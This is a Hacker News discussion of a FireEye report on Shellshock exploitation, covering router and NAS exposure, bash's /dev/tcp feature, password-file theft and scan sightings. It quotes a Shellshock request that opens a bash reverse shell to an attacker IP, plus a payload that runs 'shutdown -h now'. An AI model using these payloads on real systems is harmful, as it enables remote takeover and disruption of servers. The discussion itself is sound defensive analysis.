
Shellshock in the Wild - jonbaer
http://www.fireeye.com/blog/uncategorized/2014/09/shellshock-in-the-wild.html
======
conexions
I would just like to point out that, for all the talk of routers being
vunerable, routers in general use busybox, which in turn uses ash shell as the
default shell. Most routers will _not_ be vunerable unless bash was explicitly
installed.

[https://forum.openwrt.org/viewtopic.php?id=52937](https://forum.openwrt.org/viewtopic.php?id=52937)

~~~
buro9
Whilst this is true, many NAS boxes do remain vulnerable and tend to have
features that encourage users to make them world accessible (such as media
servers).

I was tracking the changelog for the QNAP one that I use and was pleased to
see that they didn't take too long to patch it:
[http://www.qnap.com/i/en/product_x_down/firmware_log.php?kw=...](http://www.qnap.com/i/en/product_x_down/firmware_log.php?kw=TS-659%20Pro%2FTS-659Pro%2B%2FTS-659Pro%20II&fsn=3597)

------
JetSpiegel

        GET /cgi-bin/ HTTP/1.1 Host: <SERVER_IP> User-Agent: () { :;}; /bin/ -c ‘/bin/ -i >& /dev/tcp/195.225.34.14/3333 0>&1′ 

"Many people are unaware that BASH actually has built-in commands for sending
and receiving network traffic. They work similarly to netcat, but without
requiring any other malware or supporting tools to be present on the system.
The example above shows how to create an extremely useful reverse shell, just
using BASH itself. Through a clever bit of advanced BASH syntax, it calls a
second BASH shell, which it then binds to a network socket connected to the
attacker’s IP on port 3333. Because this second shell is called with the ‘-i’
option (for “interactive” mode), it provides full two-way communication to the
attacker, operating much as a normal command line shell would. The attacker
has merely to listen on the correct port in order to receive a full
interactive shell on the victim system."

Maybe I'm seeing this wrong, but isn't the /dev filesystem provided by the
kernel?

~~~
znep
While you are right that /dev is typically a filesystem provided by the kernel
(these days, previously it was a normal "static" filesystem), bash
specifically handles various filenames under /dev when used in redirection,
including /dev/tcp and /dev/udp. See
[http://www.gnu.org/software/bash/manual/bashref.html#Redirec...](http://www.gnu.org/software/bash/manual/bashref.html#Redirections)

~~~
JetSpiegel

        $ ll /dev/tcp
        ls: cannot access /dev/tcp: No such file or directory
    

That explains it, thanks.

~~~
verbatim
Try

$ ls > /dev/tcp/127.0.0.1/12345

------
hjlklhj
For the "Stealing the Password File" attack what they're actually getting is a
list of users, not the hashed passwords. Hashed passwords are stored in
/etc/shadow in all recent (at least early 90s) systems.

This is still bad since they now will have a list of possible usernames on the
system but not nearly as bad as getting access to the hashed passwords as
well.

~~~
wut42
if they can stole /etc/passwd they probably can stole /etc/shadow, no ?

~~~
peterwwillis
Not unless they got root. /etc/passwd is world-readable, /etc/shadow is
restricted to root.

edit: damnit nknighthb, beat me to the punch! I'll add that privilege
escalation attacks on Linux are common place and it won't be difficult to get
root once they can execute arbitrary code. Installing a rootkit/backdoor is
the typical first step once you get inside a box; if you can't get root
immediately you can either brute-force a root login or sit and wait for a new
0day to pop up (which is probably every quarter for Linux systems).

Of the 50 distinct kernel exploits announced _this year_ , the following are
ones which either give privilege escalation or expose memory of the kernel:
CVE-2014-0038, CVE-2014-0049, CVE-2014-2523, CVE-2014-0100, CVE-2014-0131,
CVE-2014-0077, CVE-2013-1860, CVE-2014-2851, CVE-2013-6383, CVE-2014-0196,
CVE-2014-3153, CVE-2014-4027, CVE-2014-4014, CVE-2014-0206, CVE-2014-4699,
CVE-2014-4943, CVE-2014-4652 through 4656, CVE-2014-3534, CVE-2014-0205

~~~
drinchev
Yeah, but they are still hashed, right? So I assume admins will use sanity-
checked passwords not ones that can not be found in brute-force dictionaries.

~~~
peterwwillis
Yeah, no. 99% of admins do not use strong passwords. That's the reason we have
brute-force dictionaries: they usually work. Besides, almost all systems still
use the weak old encryption routines that can be brute-forced in a trivial
amount of time with modern hardware. There's a small handful of systems which
use a modern password hashing method for their secret files.

------
nightbrawler
Cache:
[http://webcache.googleusercontent.com/search?q=cache%3Ahttp%...](http://webcache.googleusercontent.com/search?q=cache%3Ahttp%3A%2F%2Fwww.fireeye.com%2Fblog%2Funcategorized%2F2014%2F09%2Fshellshock-
in-the-wild.html&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-
US:official&client=firefox-a&channel=sb)

------
nstart
So I booted and put up my servers just for the heck of it since there's
nothing I could care about being hacked in it. I was anyways going to wipe the
servers and start from scratch. Discovered quite a fun log today.

Basically several hackers have gotten in, installed wordpress, (and the whole
apache mysql php stack with it) and done a bunch of other stuff and left
without a trace (except for the log of course). Crazy stuff. I'm wondering how
many other websites have been hacked and aren't even bothering to check on it.

------
ewest
This is a really good article because it clearly lays out possible exploits;
journalists could use this to more accurately report about this.

------
wiredfool
I've only seen 7 probes across a couple webservers in the whole time that this
has been out. It's possible that they're not putting it a place that I'd be
seeing it in the logs. But overall, I'm not seeing a huge population of
scanners.

~~~
sisk
To add a similar experience, I've seen 8 attempts—5 (all unique origins) on
the 25th, 3 (same origin) on the 26th. This on an effectively zero traffic
machine.

------
0xdeadbeefbabe
I hope that perl script gets a date[1].

[1]
[https://www.virustotal.com/en/file/2ff32fcfee5088b14ce6c96cc...](https://www.virustotal.com/en/file/2ff32fcfee5088b14ce6c96ccb47315d7172135b999767296682c368e3d5ccac/analysis/)

------
kethinov
"GET /item?id=8365973 HTTP/1.1" "() { :;}; shutdown -h now"

"That's not nice :("

[https://twitter.com/hnstatus/status/515299364080590848](https://twitter.com/hnstatus/status/515299364080590848)

~~~
danielweber
Everyone is reacting on Twitter like that actually did something.

